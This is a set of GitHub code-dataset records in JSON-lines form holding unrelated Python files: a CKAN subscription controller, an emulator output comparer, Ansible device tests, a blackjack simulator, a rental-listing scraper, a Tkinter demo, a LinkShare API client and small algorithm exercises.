cursor.execute(\"UPDATE Contacts SET lastName = %s WHERE personID = %s\", (value, contactID))\r\n elif detail == '3':\r\n cursor.execute(\"UPDATE Contacts SET number = %s WHERE personID = %s\", (value, contactID))\r\n elif detail == '4':\r\n cursor.execute(\"UPDATE Contacts SET email = %s WHERE personID = %s\", (value, contactID))\r\n \r\n print()\r\n print(\"Contact updated succesfully.\")\r\n print()\r\n\r\n# Main function that continuesly runs displayMenu() until the user decides to exit the program\r\ndef main():\r\n while True:\r\n displayMenu()\r\n \r\nmain()","repo_name":"mukhisameer/ContactBook","sub_path":"contactbook.py","file_name":"contactbook.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"71211441640","text":"# encoding: utf-8\n\nimport re\n\nimport ckan.lib.helpers as h\nfrom ckan import model\nfrom ckan.common import g\nfrom ckan.plugins.toolkit import (\n ValidationError,\n ObjectNotFound,\n get_action,\n _,\n request,\n BaseController,\n abort,\n render,\n redirect_to,\n config,\n)\nfrom ckan.lib.mailer import MailerException\n\nfrom ckanext.subscribe import email_auth\nfrom ckanext.subscribe import model as subscribe_model\n\nlog = __import__('logging').getLogger(__name__)\n\n\nclass SubscribeController(BaseController):\n def signup(self):\n # validate inputs\n email = request.POST.get('email')\n if not email:\n abort(400, _(u'No email address supplied'))\n email = email.strip()\n # pattern from https://html.spec.whatwg.org/#e-mail-state-(type=email)\n email_re = r\"^[a-zA-Z0-9.!#$%&'*+\\/=?^_`{|}~-]+@[a-zA-Z0-9]\"\\\n r\"(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\\.[a-zA-Z0-9]\"\\\n r\"(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$\"\n if not re.match(email_re, email):\n abort(400, _(u'Email supplied is invalid'))\n\n # create subscription\n data_dict = {\n 'email': email,\n 'dataset_id': request.POST.get('dataset'),\n 'group_id': request.POST.get('group'),\n 'organization_id': request.POST.get('organization'),\n }\n context = {\n u'model': model,\n u'session': model.Session,\n u'user': g.user,\n u'auth_user_obj': g.userobj\n }\n try:\n subscription = get_action(u'subscribe_signup')(context, data_dict)\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before', 'dataset_id',\n 'group_id'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error subscribing: {}'\n .format('; '.join(error_messages))))\n return self._redirect_back_to_subscribe_page_from_request(data_dict)\n except MailerException:\n h.flash_error(_('Error sending email - please contact an '\n 'administrator for help'))\n return self._redirect_back_to_subscribe_page_from_request(data_dict)\n else:\n h.flash_success(\n _('Subscription requested. Please confirm, by clicking in the '\n 'link in the email just sent to you'))\n return self._redirect_back_to_subscribe_page(\n subscription['object_name'], subscription['object_type'])\n\n def verify_subscription(self):\n data_dict = {'code': request.params.get('code')}\n context = {\n u'model': model,\n u'session': model.Session,\n u'user': g.user,\n u'auth_user_obj': g.userobj\n }\n\n try:\n subscription = get_action(u'subscribe_verify')(context, data_dict)\n except ValidationError as err:\n h.flash_error(_('Error subscribing: {}'\n .format(err.error_dict['message'])))\n return redirect_to('home')\n\n h.flash_success(\n _('Subscription confirmed'))\n code = email_auth.create_code(subscription['email'])\n\n return redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='manage',\n code=code,\n )\n\n def manage(self):\n code = request.params.get('code')\n if not code:\n h.flash_error('Code not supplied')\n log.debug('No code supplied')\n return self._request_manage_code_form()\n try:\n email = email_auth.authenticate_with_code(code)\n except ValueError as exp:\n h.flash_error('Code is invalid: {}'.format(exp))\n log.debug('Code is invalid: {}'.format(exp))\n return self._request_manage_code_form()\n\n # user has done auth, but it's an email rather than a ckan user, so\n # use site_user\n site_user = get_action('get_site_user')({\n 'model': model,\n 'ignore_auth': True},\n {}\n )\n context = {\n u'model': model,\n u'user': site_user['name'],\n }\n subscriptions = \\\n get_action(u'subscribe_list_subscriptions')(\n context, {'email': email})\n frequency_options = [\n dict(text=f.name.lower().capitalize().replace(\n 'Immediate', 'Immediately'),\n value=f.name)\n for f in sorted(subscribe_model.Frequency, key=lambda x: x.value)\n ]\n return render(u'subscribe/manage.html', extra_vars={\n 'email': email,\n 'code': code,\n 'subscriptions': subscriptions,\n 'frequency_options': frequency_options,\n })\n\n def update(self):\n code = request.POST.get('code')\n if not code:\n h.flash_error('Code not supplied')\n log.debug('No code supplied')\n return self._request_manage_code_form()\n try:\n email = email_auth.authenticate_with_code(code)\n except ValueError as exp:\n h.flash_error('Code is invalid: {}'.format(exp))\n log.debug('Code is invalid: {}'.format(exp))\n return self._request_manage_code_form()\n\n subscription_id = request.POST.get('id')\n if not subscription_id:\n abort(400, _(u'No id supplied'))\n subscription = model.Session.query(subscribe_model.Subscription) \\\n .get(subscription_id)\n if not subscription:\n abort(404, _(u'That subscription ID does not exist.'))\n if subscription.email != email:\n h.flash_error('Code is invalid for that subscription')\n log.debug('Code is invalid for that subscription')\n return self._request_manage_code_form()\n\n frequency = request.POST.get('frequency')\n if not frequency:\n abort(400, _(u'No frequency supplied'))\n\n # user has done auth, but it's an email rather than a ckan user, so\n # use site_user\n site_user = get_action('get_site_user')({\n 'model': model,\n 'ignore_auth': True},\n {}\n )\n context = {\n u'model': model,\n u'session': model.Session,\n u'user': site_user['name'],\n }\n data_dict = {\n 'id': subscription_id,\n 'frequency': frequency,\n }\n try:\n get_action(u'subscribe_update')(context, data_dict)\n except ValidationError as err:\n h.flash_error(_('Error updating subscription: {}'\n .format(err.error_dict['message'])))\n else:\n h.flash_success(_('Subscription updated'))\n\n return redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='manage',\n code=code,\n )\n\n def unsubscribe(self):\n # allow a GET or POST to do this, so that we can trigger it from a link\n # in an email or a web form\n code = request.params.get('code')\n if not code:\n h.flash_error('Code not supplied')\n log.debug('No code supplied')\n return self._request_manage_code_form()\n try:\n email = email_auth.authenticate_with_code(code)\n except ValueError as exp:\n h.flash_error('Code is invalid: {}'.format(exp))\n log.debug('Code is invalid: {}'.format(exp))\n return self._request_manage_code_form()\n\n # user has done auth, but it's an email rather than a ckan user, so\n # use site_user\n site_user = get_action('get_site_user')({\n 'model': model,\n 'ignore_auth': True},\n {}\n )\n context = {\n u'model': model,\n u'user': site_user['name'],\n }\n data_dict = {\n 'email': email,\n 'dataset_id': request.params.get('dataset'),\n 'group_id': request.params.get('group'),\n 'organization_id': request.params.get('organization'),\n }\n try:\n object_name, object_type = \\\n get_action(u'subscribe_unsubscribe')(context, data_dict)\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before', 'dataset_id',\n 'group_id'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error unsubscribing: {}'\n .format('; '.join(error_messages))))\n except ObjectNotFound as err:\n h.flash_error(_('Error unsubscribing: {}'.format(err)))\n else:\n h.flash_success(\n _('You are no longer subscribed to this {}'\n .format(object_type)))\n return self._redirect_back_to_subscribe_page(object_name,\n object_type)\n return self._redirect_back_to_subscribe_page_from_request(data_dict)\n\n def unsubscribe_all(self):\n # allow a GET or POST to do this, so that we can trigger it from a link\n # in an email or a web form\n code = request.params.get('code')\n if not code:\n h.flash_error('Code not supplied')\n log.debug('No code supplied')\n return self._request_manage_code_form()\n try:\n email = email_auth.authenticate_with_code(code)\n except ValueError as exp:\n h.flash_error('Code is invalid: {}'.format(exp))\n log.debug('Code is invalid: {}'.format(exp))\n return self._request_manage_code_form()\n\n # user has done auth, but it's an email rather than a ckan user, so\n # use site_user\n site_user = get_action('get_site_user')({\n 'model': model,\n 'ignore_auth': True},\n {}\n )\n context = {\n u'model': model,\n u'user': site_user['name'],\n }\n data_dict = {\n 'email': email,\n }\n try:\n get_action(u'subscribe_unsubscribe_all')(context, data_dict)\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error unsubscribing: {}'\n .format('; '.join(error_messages))))\n except ObjectNotFound as err:\n h.flash_error(_('Error unsubscribing: {}'.format(err)))\n else:\n h.flash_success(\n _('You are no longer subscribed to notifications from {}'\n .format(config.get('ckan.site_title'))))\n return redirect_to('home')\n return redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='manage',\n code=code,\n )\n\n def _redirect_back_to_subscribe_page(self, object_name, object_type):\n if object_type == 'dataset':\n return redirect_to(controller='package', action='read',\n id=object_name)\n elif object_type == 'group':\n return redirect_to(controller='group', action='read',\n id=object_name)\n elif object_type == 'organization':\n return redirect_to(controller='organization', action='read',\n id=object_name)\n else:\n return redirect_to('home')\n\n def _redirect_back_to_subscribe_page_from_request(self, data_dict):\n if data_dict.get('dataset_id'):\n dataset_obj = model.Package.get(data_dict['dataset_id'])\n return redirect_to(\n controller='package', action='read',\n id=dataset_obj.name if dataset_obj else data_dict['dataset_id']\n )\n elif data_dict.get('group_id'):\n group_obj = model.Group.get(data_dict['group_id'])\n controller = 'organization' \\\n if group_obj and group_obj.is_organization \\\n else 'group'\n return redirect_to(\n controller=controller, action='read',\n id=group_obj.name if group_obj else data_dict['group_id'])\n else:\n return redirect_to('home')\n\n def _request_manage_code_form(self):\n return redirect_to(\n controller='ckanext.subscribe.controller:SubscribeController',\n action='request_manage_code',\n )\n\n def request_manage_code(self):\n email = request.POST.get('email')\n if not email:\n return render(u'subscribe/request_manage_code.html', extra_vars={})\n\n context = {\n u'model': model,\n }\n try:\n get_action(u'subscribe_request_manage_code')(\n context, dict(email=email))\n except ValidationError as err:\n error_messages = []\n for key_ignored in ('message', '__before'):\n if key_ignored in err.error_dict:\n error_messages.extend(err.error_dict.pop(key_ignored))\n if err.error_dict:\n error_messages.append(repr(err.error_dict))\n h.flash_error(_('Error requesting code: {}'\n .format('; '.join(error_messages))))\n except ObjectNotFound as err:\n h.flash_error(_('Error requesting code: {}'.format(err)))\n except MailerException:\n h.flash_error(_('Error sending email - please contact an '\n 'administrator for help'))\n else:\n h.flash_success(\n _('An access link has been emailed to: {}'\n .format(email)))\n return redirect_to('home')\n return render(u'subscribe/request_manage_code.html',\n extra_vars={'email': email})\n","repo_name":"bellisk/ckanext-subscribe","sub_path":"ckanext/subscribe/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":14543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41537288338","text":"#!/usr/bin/env python3\n\n\"\"\"\nRuns two emulators in parallel and stops when the output from them differs.\n\nThe emulators have to print the contents of everything that should be\ncompared to stdout. The format of the print-out should be exactly the\nsame for both emulators. Each log line should end with '\\n' (newline).\n\nThe emulators also have to respond to commands via stdin. This script expects\nthe emulators to send one log line at a time to stdout. When the script is ready\nfor a new log line (i.e. a new instruction to be executed) it will send 'n' and\nthen enter. It also expects the emulators to quit when sending 'q' and then\nenter. The emulators have to flush to stdout instantly.\n\nDo this before running this script:\n\n- Put both emulators and their dependencies in the same directory.\n- Set up the name and args to the emulator under test and reference emulator.\n The config is found in the emulator_under_test and reference_emulator objects.\n- Set the log_line_token variable. It should be a unique string that is found in\n the log lines, and is used to identify the start of the log output.\n- Make the emulators flush immediately when printing to stdout.\n * In C: setbuf(stdout, NULL);\n * In C++: std::cout << \"output\" << std::flush;\n- Make the emulators listen to commands on stdin:\n * Execute a new instruction when receiving 'n'.\n * Quit when receiving 'q'.\n- The working directory of the script should be the same as the emulator\n binaries.\n\nThe script compares one instruction at a time. It compares by string comparison.\nAfter comparing the emulator under test vs. the reference emulator, it will\nask the emulators to execute a new instruction if no difference was found.\nIt will quit and show the last 20 executed instructions if a diff was found\nbetween them. For test binaries such as zexdoc it could take billions of\ninstructions before a diff is found.\n\nIf one or both of the emulators run to completion, i.e. no diffs are found, the\nscript will exit with exceptions etc. This is because it loses connection to the\nemulator and there's no soft shutdown.\n\nTested on Python 3.8.8 only. Will need at least Python 3. Also, only tested on\nLinux.\n\"\"\"\n\nimport asyncio\n\n\nclass Emulator:\n def __init__(self, name: str, args: []):\n self.name = name\n self.args = args\n\n def __str__(self):\n name = self.name\n maybe_space = ' ' if len(self.args) > 0 else ''\n args = ' '.join(self.args)\n\n return './' + name + maybe_space + args\n\n\n# Must be adapted to each emulator:\nemulator_under_test = Emulator('emulator', ['run', 'zexdoc'])\nreference_emulator = Emulator('z80_tests', [])\nlog_line_token = 'pc=0x'\n\n# Can be changed if you really want to:\nqueue_length = 20\nlog_string_encoding = 'utf-8'\nnew_instruction_character = b\"n\\n\"\n\n\nasync def setup(sut_config: Emulator, ref_config: Emulator):\n sut = await asyncio.subprocess.create_subprocess_exec(\n f'./{sut_config.name}', *sut_config.args,\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE\n )\n ref = await asyncio.subprocess.create_subprocess_exec(\n f'./{ref_config.name}', *ref_config.args,\n stdin=asyncio.subprocess.PIPE,\n stdout=asyncio.subprocess.PIPE\n )\n\n return sut, ref\n\n\nasync def get_to_first_line(emu_process: asyncio.subprocess.Process):\n binary_line = await emu_process.stdout.readuntil(b\"\\n\")\n\n while binary_line:\n str_line = binary_line.decode(log_string_encoding).strip(\"\\n\")\n if log_line_token in str_line:\n return str_line\n else:\n emu_process.stdin.write(new_instruction_character)\n\n binary_line = await emu_process.stdout.readuntil(b\"\\n\")\n\n\ndef print_arrow_at_first_diff(sut_line, ref_line, offset):\n diff_pos = 0\n for pos in range(0, len(sut_line)):\n if sut_line[pos] == ref_line[pos]:\n diff_pos += 1\n else:\n break\n\n print(' ' * (diff_pos + offset) + '^')\n\n\nasync def compare_emulator_outputs(sut, sut_line, ref, ref_line):\n sut.stdin.write(new_instruction_character)\n ref.stdin.write(new_instruction_character)\n queue = []\n line_number = 0\n\n while sut_line == ref_line:\n if len(queue) < queue_length:\n queue.append(sut_line)\n else:\n queue.append(sut_line)\n queue.pop(0)\n\n if \"pc=0x\" not in sut_line:\n print(sut_line)\n\n sut_binary_line = await sut.stdout.readuntil(b\"\\n\")\n sut_line = sut_binary_line.decode(log_string_encoding).strip(\"\\n\")\n sut.stdin.write(new_instruction_character)\n\n ref_binary_line = await ref.stdout.readuntil(b\"\\n\")\n ref_line = ref_binary_line.decode(log_string_encoding).strip(\"\\n\")\n ref.stdin.write(new_instruction_character)\n\n line_number += 1\n\n if line_number % 1000000 == 0:\n print(f\"At line number: {line_number:,}\")\n\n print(\"********** FOUND DIFFERENCE IN THE EMULATORS **********\")\n print(f\"Line number: {line_number}\\n\\n\")\n print(f\"Last {queue_length} instructions before the diff:\\n\")\n for line in queue:\n print(line)\n\n print()\n print(f\"SUT: {sut_line}\")\n print(f\"REF: {ref_line}\")\n print_arrow_at_first_diff(sut_line, ref_line, 5)\n\n\nasync def main():\n sut, ref = await setup(emulator_under_test, reference_emulator)\n\n print(f\"\\nStarting comparison between '{emulator_under_test}' and '{reference_emulator}'\")\n\n sut_line = await get_to_first_line(sut)\n ref_line = await get_to_first_line(ref)\n\n print(\"Found the first log lines of each emulator. Starting on comparison...\\n\\n\")\n\n await compare_emulator_outputs(sut, sut_line, ref, ref_line)\n\n\nasyncio.run(main())\n","repo_name":"mika-s/MikasEmulators","sub_path":"helpers/compare_emulators_interactively.py","file_name":"compare_emulators_interactively.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28424872500","text":"import pytest\n\npytest.importorskip(\"kick\")\n\nfrom ansible_collections.community.general.plugins.module_utils.network.ftd.device import FtdPlatformFactory, FtdModel, FtdAsa5500xPlatform, \\\n Ftd2100Platform, AbstractFtdPlatform\nfrom ansible_collections.community.general.tests.unit.modules.network.ftd.test_ftd_install import DEFAULT_MODULE_PARAMS\n\n\nclass TestFtdModel(object):\n\n def test_has_value_should_return_true_for_existing_models(self):\n assert FtdModel.FTD_2120 in FtdModel.supported_models()\n assert FtdModel.FTD_ASA5516_X in FtdModel.supported_models()\n\n def test_has_value_should_return_false_for_non_existing_models(self):\n assert 'nonExistingModel' not in FtdModel.supported_models()\n assert None not in FtdModel.supported_models()\n\n\nclass TestFtdPlatformFactory(object):\n\n @pytest.fixture(autouse=True)\n def mock_devices(self, mocker):\n mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Kp')\n mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Ftd5500x')\n\n def test_factory_should_return_corresponding_platform(self):\n ftd_platform = FtdPlatformFactory.create(FtdModel.FTD_ASA5508_X, dict(DEFAULT_MODULE_PARAMS))\n assert type(ftd_platform) is FtdAsa5500xPlatform\n ftd_platform = FtdPlatformFactory.create(FtdModel.FTD_2130, dict(DEFAULT_MODULE_PARAMS))\n assert type(ftd_platform) is Ftd2100Platform\n\n def test_factory_should_raise_error_with_not_supported_model(self):\n with pytest.raises(ValueError) as ex:\n FtdPlatformFactory.create('nonExistingModel', dict(DEFAULT_MODULE_PARAMS))\n assert \"FTD model 'nonExistingModel' is not supported by this module.\" == ex.value.args[0]\n\n\nclass TestAbstractFtdPlatform(object):\n\n def test_install_ftd_image_raise_error_on_abstract_class(self):\n with pytest.raises(NotImplementedError):\n AbstractFtdPlatform().install_ftd_image(dict(DEFAULT_MODULE_PARAMS))\n\n def test_supports_ftd_model_should_return_true_for_supported_models(self):\n assert Ftd2100Platform.supports_ftd_model(FtdModel.FTD_2120)\n assert FtdAsa5500xPlatform.supports_ftd_model(FtdModel.FTD_ASA5516_X)\n\n def test_supports_ftd_model_should_return_false_for_non_supported_models(self):\n assert not AbstractFtdPlatform.supports_ftd_model(FtdModel.FTD_2120)\n assert not Ftd2100Platform.supports_ftd_model(FtdModel.FTD_ASA5508_X)\n assert not FtdAsa5500xPlatform.supports_ftd_model(FtdModel.FTD_2120)\n\n def test_parse_rommon_file_location(self):\n server, path = AbstractFtdPlatform.parse_rommon_file_location('tftp://1.2.3.4/boot/rommon-boot.foo')\n assert '1.2.3.4' == server\n assert '/boot/rommon-boot.foo' == path\n\n def test_parse_rommon_file_location_should_fail_for_non_tftp_protocol(self):\n with pytest.raises(ValueError) as ex:\n AbstractFtdPlatform.parse_rommon_file_location('http://1.2.3.4/boot/rommon-boot.foo')\n assert 'The ROMMON image must be downloaded from TFTP server' in str(ex.value)\n\n\nclass TestFtd2100Platform(object):\n\n @pytest.fixture\n def kp_mock(self, mocker):\n return mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Kp')\n\n @pytest.fixture\n def module_params(self):\n return dict(DEFAULT_MODULE_PARAMS)\n\n def test_install_ftd_image_should_call_kp_module(self, kp_mock, module_params):\n ftd = FtdPlatformFactory.create(FtdModel.FTD_2110, module_params)\n ftd.install_ftd_image(module_params)\n\n assert kp_mock.called\n assert kp_mock.return_value.ssh_console.called\n ftd_line = kp_mock.return_value.ssh_console.return_value\n assert ftd_line.baseline_fp2k_ftd.called\n assert ftd_line.disconnect.called\n\n def test_install_ftd_image_should_call_disconnect_when_install_fails(self, kp_mock, module_params):\n ftd_line = kp_mock.return_value.ssh_console.return_value\n ftd_line.baseline_fp2k_ftd.side_effect = Exception('Something went wrong')\n\n ftd = FtdPlatformFactory.create(FtdModel.FTD_2120, module_params)\n with pytest.raises(Exception):\n ftd.install_ftd_image(module_params)\n\n assert ftd_line.baseline_fp2k_ftd.called\n assert ftd_line.disconnect.called\n\n\nclass TestFtdAsa5500xPlatform(object):\n\n @pytest.fixture\n def asa5500x_mock(self, mocker):\n return mocker.patch('ansible_collections.community.general.plugins.module_utils.network.ftd.device.Ftd5500x')\n\n @pytest.fixture\n def module_params(self):\n return dict(DEFAULT_MODULE_PARAMS)\n\n def test_install_ftd_image_should_call_kp_module(self, asa5500x_mock, module_params):\n ftd = FtdPlatformFactory.create(FtdModel.FTD_ASA5508_X, module_params)\n ftd.install_ftd_image(module_params)\n\n assert asa5500x_mock.called\n assert asa5500x_mock.return_value.ssh_console.called\n ftd_line = asa5500x_mock.return_value.ssh_console.return_value\n assert ftd_line.rommon_to_new_image.called\n assert ftd_line.disconnect.called\n\n def test_install_ftd_image_should_call_disconnect_when_install_fails(self, asa5500x_mock, module_params):\n ftd_line = asa5500x_mock.return_value.ssh_console.return_value\n ftd_line.rommon_to_new_image.side_effect = Exception('Something went wrong')\n\n ftd = FtdPlatformFactory.create(FtdModel.FTD_ASA5516_X, module_params)\n with pytest.raises(Exception):\n ftd.install_ftd_image(module_params)\n\n assert ftd_line.rommon_to_new_image.called\n assert ftd_line.disconnect.called\n","repo_name":"ansible-collection-migration/community.general","sub_path":"tests/unit/module_utils/network/ftd/test_device.py","file_name":"test_device.py","file_ext":"py","file_size_in_byte":5687,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"3430484715","text":"# Blackjack basic strategy simulator\n\nimport random\n\nfrom Deck import Deck\nfrom Hand import Hand\nfrom Dealer import Dealer\nfrom Player import Player\nfrom Data import Data\n\ndata = Data()\n\ndeck = Deck(4, 0.75)\ndeck.shuffle()\n\nNUM_ROUNDS = 1000000\n\n# Init dealer\ndealer = Dealer(False)\nplayer = Player(1000)\n\n# Main game loop\nfor _ in range(NUM_ROUNDS):\n player.dealHand(deck)\n dealer.dealHand(deck)\n\n dealerUpCardVal = dealer.getShowingCard().getCardValForStats()\n\n if (dealer.hand.getHandVal() == 21 or player.hand.getHandVal() == 21):\n player.clearHand()\n dealer.clearHand()\n continue\n else:\n # Make a random choice, 0 - Stand, 1 - Hit, 2 - Double\n choice = random.randrange(0, 2)\n\n if (choice == 0):\n playerHandVal = player.hand.getHandVal()\n\n dealer.hitUntilDone(deck)\n dealerHandVal = dealer.hand.getHandVal()\n\n data.compareHandsAndLogResult(player.hand.getStatName(), dealerUpCardVal, playerHandVal, dealerHandVal, choice)\n else:\n playerHandName = player.hand.getStatName()\n player.hit(deck)\n\n dealer.hitUntilDone(deck)\n dealerHandVal = dealer.hand.getHandVal()\n\n data.compareHandsAndLogResult(playerHandName, dealerUpCardVal, player.hand.getHandVal(), dealerHandVal, choice)\n\n player.clearHand()\n dealer.clearHand()\n\n if (deck.needsShuffle()):\n deck.shuffle()\n\ndata.printResults()","repo_name":"arkostin/blackjackSim","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3304401724","text":"# coding=utf-8\r\nimport json\r\nimport os\r\nimport pandas as pd\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\n\r\n\r\ndef store_info():\r\n output_file_name = 'ftx-2.xlsx'\r\n df = pd.DataFrame(get_info_from())\r\n df.to_excel(output_file_name, index=False)\r\n\r\n\r\ndef get_detail_from(url):\r\n content = requests.get(url)\r\n\r\n soup = BeautifulSoup(content.text, 'lxml')\r\n\r\n phone = ''\r\n\r\n if soup.select('p.text_phone'):\r\n phone = str(soup.select('p.text_phone')[0].get_text()).replace(' ', '')\r\n elif soup.select('div.tjcont-jjr-line2'):\r\n phone = str(soup.select('div.tjcont-jjr-line2')[0].get_text()).replace(' ', '')\r\n else:\r\n pass\r\n\r\n detail_info = {\r\n 'phone': phone,\r\n 'type': soup.select('div.tt')[1].get_text(),\r\n 'area': soup.select('div.tt')[2].get_text()\r\n }\r\n\r\n return detail_info\r\n\r\n\r\ndef get_info_from():\r\n # url = 'https://sz.zu.fang.com/house-a089-b02095/g21/'\r\n url = 'https://sz.zu.fang.com/house-a089-b02095/g21-i32/'\r\n\r\n host = 'https://sz.zu.fang.com'\r\n\r\n content = requests.get(url)\r\n\r\n soup = BeautifulSoup(content.text, 'lxml')\r\n\r\n house_detail_list = []\r\n\r\n for item in soup.select('dd.info'):\r\n href = item.select('a')[0].get('href')\r\n title = item.select('p')[0].get_text()\r\n des = item.select('p')[1].get_text()\r\n location = item.select('p')[2].get_text()\r\n price = item.select('span.price')[0].get_text()\r\n\r\n house_info = {\r\n 'href': host + href,\r\n 'title': title,\r\n 'des': str(des).replace(' ', ''),\r\n 'location': location,\r\n 'price': price\r\n }\r\n\r\n detail_info = {}\r\n detail_info.update(house_info)\r\n detail_info.update(get_detail_from(host + href))\r\n\r\n house_detail_list.append(detail_info)\r\n\r\n return house_detail_list\r\n\r\n\r\nif __name__ == '__main__':\r\n store_info()\r\n","repo_name":"hiyaojie/python-crawler","sub_path":"house-crawler/src/fangtx.py","file_name":"fangtx.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9423853232","text":"'''\r\nHello World\r\nOOPs Method\r\n'''\r\n\r\nfrom tkinter import *\r\n\r\nclass HelloNameFrame(Frame):\r\n\r\n def __init__(self, the_window):\r\n\r\n Frame.__init__(self, the_window)\r\n\r\n self.user_name = StringVar()\r\n self.display_string = StringVar()\r\n \r\n self.label_1 = Label(self, text='Name: ').grid(row=0,column=0)\r\n self.name = Entry(self, textvariable=self.user_name).grid(row=0,column=1)\r\n self.button = Button(self,text='Click Me', command=self.display_output).grid(row=1,column=0)\r\n self.display_label = Label(self, textvariable = self.display_string, relief='solid', width=15).grid(row=1,column=1)\r\n\r\n def display_output(self):\r\n self.display_string.set('Hello ' + self.user_name.get())\r\n \r\n\r\nroot = Tk()\r\nframe_A = HelloNameFrame(root)\r\nframe_A.grid(row=0,column=0)\r\nroot.mainloop()\r\n \r\n","repo_name":"Platforuma/Beginner-s_Python_Codes","sub_path":"13_GUI/22_Tkinter--Hello-name-class-method.py","file_name":"22_Tkinter--Hello-name-class-method.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12096849741","text":"\nimport urllib2\nfrom lxml import objectify\n\nUSER_AGENT = 'python-linkshare'\nPRODUCT_SEARCH_URL = \"http://productsearch.linksynergy.com/productsearch?token={0}\"\nRESULTS_URL = \"{0}&MaxResults={1}&pagenumber={2}\"\n\nclass API(object):\n def __init__(self, token='', max_results=20, **kwargs):\n self.token = token\n self.max_results = max_results\n\n def product_search(self, mid=None, keyword=None, cat=None, sorts=None, sorttypes=None):\n search_url_parts = [PRODUCT_SEARCH_URL.format(self.token)]\n if mid is not None:\n search_url_parts.append('mid={0}'.format(mid))\n if keyword is not None:\n search_url_parts.append('keyword={0}'.format(keyword))\n if cat is not None:\n search_url_parts.append('cat={0}'.format(cat))\n if sorts:\n if len(sorts) != len(sorttypes):\n raise ValueError(\"sorts sequence must be the same length as sorttypes sequence\")\n for sort, sorttype in zip(sorts, sorttypes):\n search_url_parts.append('sort={0}&sorttype={1}'.format(sort, sorttype))\n search_url = '&'.join(search_url_parts)\n return _results_generator(search_url, self.max_results)\n\nclass MerchantAPI(API):\n def __init__(self, mid='', **kwargs):\n self.mid = mid\n API.__init__(self, **kwargs)\n\n def product_search(self, **kwargs):\n kwargs['mid'] = self.mid\n return API.product_search(self, **kwargs)\n\ndef _results_generator(base_url, max_results):\n page = 1\n opener = urllib2.build_opener()\n headers = {'User-Agent': USER_AGENT}\n while True:\n request = urllib2.Request(RESULTS_URL.format(base_url, max_results, page),\n headers=headers)\n result = objectify.parse(opener.open(request)).getroot()\n if hasattr(result, 'item'):\n for item in result.item:\n yield item\n else:\n break\n page += 1\n","repo_name":"brildum/python-linkshare","sub_path":"linkshare/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"8026258179","text":"arr = [1, 6, 11, 5]\r\nn = len(arr)\r\nmax_value = sum(arr)\r\nt = [[None for i in range(max_value+1)]for j in range(n+1)]\r\nfor i in range(n+1):\r\n t[i][0] = True\r\nfor j in range(1,max_value+1):\r\n t[0][j] = False\r\nfor i in range(1,n+1):\r\n for j in range(1,max_value+1):\r\n if arr[i-1]<= j:\r\n t[i][j] = t[i-1][j-arr[i-1]] or t[i-1][j]\r\n else:\r\n t[i][j] = t[i-1][j]\r\narr_final = []\r\n'''\r\nTravewersing the last row and \r\nfetching all the \"TRUE\" values into arr_final \r\n'''\r\nfor i in range(0,max_value+1):\r\n a = t[n][i]\r\n #print(a)\r\n #print()\r\n if a == True:\r\n #print(\"YES\")\r\n arr_final.append(i)\r\n else:\r\n continue\r\n\r\n'''\r\nmini = range - 2(S1) {here range is nothing but the maximum sum}\r\nand depending upon the number of values we take even loop or the odd loop\r\n'''\r\nmini = 10e7\r\nlength = len(arr_final)\r\nif length%2 == 0:\r\n length = length //2\r\nelse:\r\n length = (length//2)+1\r\n\r\n'''\r\nWe were actually traversing only upto \r\nthe half part of the array because we only need \r\ns1 to check the condition {range - 2*S1}\r\nand if we finding the minimum value \r\nwe'll be replacing them into the mini\r\n'''\r\nfor i in range(length):\r\n a = max_value - 2*(arr_final[i])\r\n if a K:\n if S[l] == '.':\n cur -= 1\n l += 1\n ans = max(ans, r - l + 1)\nprint(ans)\n","repo_name":"kotadd/competitive_programming","sub_path":"syakutori/abc229_d.py","file_name":"abc229_d.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"23226842930","text":"# Task\n# You are given a string S. Your task is to find out if the string S contains: alphanumeric characters, alphabetical characters, digits, lowercase and uppercase characters.\n\n# Input Format\n# A single line containing a string 